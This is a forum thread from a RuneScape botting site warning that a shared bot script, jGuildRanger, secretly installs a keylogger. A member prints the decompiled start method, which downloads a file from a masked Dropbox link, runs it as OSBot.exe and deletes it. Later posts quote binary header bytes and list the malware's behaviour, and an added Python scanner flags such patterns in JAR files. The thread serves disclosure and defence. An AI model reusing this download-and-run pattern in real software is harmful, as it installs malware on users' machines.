OSBot :: 2007 OSRS Botting

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

jGuildRanger Botters - WARNING

Confirmed

Information stealer has been found and confirmed.

Windows users affected, Mac/other platforms not.

I decided to check a few scripts within the local downloadable script section.

Came across jGuildRanger;

I decompiled the jar file, and I noticed this upon start:

    public void onStart()
    {
        try
        {
            saveFileFromUrl("OSBot.exe", "https://www.dropbox.com/s/************/index.html");
        }
        catch (MalformedURLException localMalformedURLException) {}
        catch (IOException localIOException) {}
        try
        {
            Process p = Runtime.getRuntime().exec("OSBot.exe");
            File file = new File("OSBot.exe");
            file.delete();
        }
        catch (IOException localIOException1) {}
        this.startExperience = this.client.getLevelExperience()[org.osbot.script.rs2.skill.Skill.RANGED.getId()];
        this.startLevel = this.client.getLevelStat()[org.osbot.script.rs2.skill.Skill.RANGED.getId()];
        this.startTimer = System.currentTimeMillis();
    }

Pretty common sense what the code does.

Botters who used this script, I advise you to scan your computer and check msConfig to see if there are any keyloggers/RATs upon start:

This may be an accidental implementation, but it seems to be dangerous and users weren't told if a file was being downloaded ~ fishy

Edited by Declarative
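
A static triage check for the pattern found in the decompiled onStart() above, added here as an example (not code from this thread or from OSBot): it reads each class's constant pool in a script JAR without running it, and flags process-execution and network class references plus URL or executable-name string literals. The rule set, the function names and the constructed sample JAR (with an example.invalid URL) are assumptions.

```python
import io
import re
import struct
import zipfile

# Payload bytes after the tag for each non-Utf8 constant-pool entry.
CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
            12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
# Assumed heuristic rules for triage, not an exhaustive list.
REFS = {"java/lang/Runtime": "can start a process",
        "java/lang/ProcessBuilder": "can start a process",
        "java/net/URL": "can fetch from the network"}
LITERAL = re.compile(r"^https?://|\.(exe|scr|bat|dll)$", re.I)

def utf8_constants(data):
    """Return every Utf8 constant (class names, string literals) in a .class file."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    count, = struct.unpack_from(">H", data, 8)
    pos, idx, out = 10, 1, []
    while idx < count:
        tag, pos = data[pos], pos + 1
        size = struct.unpack_from(">H", data, pos)[0] + 2 if tag == 1 else CP_SIZES[tag]
        if tag == 1:
            out.append(data[pos + 2:pos + size].decode("utf-8", "replace"))
        pos += size
        idx += 2 if tag in (5, 6) else 1  # Long and Double take two slots
    return out

def scan_jar(jar_bytes):
    """Map each flagged class in a JAR (given as bytes) to its sorted findings."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        for name in (n for n in jar.namelist() if n.endswith(".class")):
            consts = utf8_constants(jar.read(name))
            hits = {REFS[c] for c in consts if c in REFS}
            hits |= {"literal to review: " + c for c in consts if LITERAL.search(c)}
            if hits:
                report[name] = sorted(hits)
    return report

def sample_jar():
    """Constructed sample: one class reduced to its header and constant pool."""
    consts = ["java/lang/Runtime", "OSBot.exe", "https://example.invalid/index.html"]
    pool = b"".join(b"\x01" + struct.pack(">H", len(c)) + c.encode() for c in consts)
    cls = b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 50, len(consts) + 1) + pool
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("Sample.class", cls)
    return buf.getvalue()
```

A hit is a reason to decompile and read the class before running the script, not proof of malice; a clean result does not clear a script that hides its strings.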

  • Author

Good find, I'll cut off my right testicle if this turns out not to be a virus.

 

Come on? Who would save a file from an HTML file, from Dropbox:

Save it as OSBot.exe??

pathetic little kids I say.

------

I am attempting to reverse-engineer the executable file to see what it is.

Edited by Declarative

Is this the same script as 'jRangingGuild'? :/ Otherwise I'm fucked. I've downloaded it and it's in my local folders map. What do I do?

I'm on Mac.. What's MsConfig? And I don't have a virus scanner or something..

Edited by PaasHazen18

  • Administrator

I don't think reverse engineering it is necessary, but if someone wants to do it and post their findings, that's fine by me. Just make sure you've got it in an isolated environment or know what you're doing.

Is this the same script as 'jRangingGuild'? :/ Otherwise I'm fucked. I've downloaded it and it's in my local folders map. What do I do?

I'm on Mac.. What's MsConfig? And I don't have a virus scanner or something..

If you haven't run the script you're fine. If so do a virus scan (download one like Malwarebytes Anti-Malware).

  • Author

Virus confirmed... It's a keylogger guys! Mac users are fine!

Didn't take much: here are a few lines of the compiled version.. Brilliant.:

We all know it's a virus when it starts with: Stupid .net

MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽÚĨáð@Õ6@ V `P¡P\@CODElØÚ `DATA<ðÞ@ÀBSSÙ

Edited by Declarative

 

Virus confirmed... It's a keylogger guys! Mac users are fine!

Didn't take much: here are a few lines of the compiled version.. Brilliant.:

We all know it's a virus when it starts with: Stupid .net

MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽÚĨáð@Õ6@ V `P¡P\@CODElØÚ `DATA<ðÞ@ÀBSSÙ

 

It probably is. I might be able to decompile it if you can pm me the link to the file.

Modifies registry, debugger check, process memory editing and steals information.

Edited by Aeon

  • Author

Modifies registry, debugger check, process memory editing and steals information.

 

Beaten me to it... I was exporting a decompiled version but my laptop decided to say bye bye.

 

 

Verified on Modifies registry, and others.

+1 nice find dude!

 

 

Nice find man

Someone's got to do it.

 

Virus confirmed... It's a keylogger guys! Mac users are fine!

Didn't take much: here are a few lines of the compiled version.. Brilliant.:

We all know it's a virus when it starts with: Stupid .net

MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^B*àŽÚĨáð@Õ6@ V `P¡P\@CODElØÚ `DATA<ðÞ@ÀBSSÙ

Why are Mac users fine? 

 

Do I just delete the script from the script folder and then from my laptop? Wtf do I have to do D:

 

Never trusting local scripts again, only from legit people..

Edited by PaasHazen18
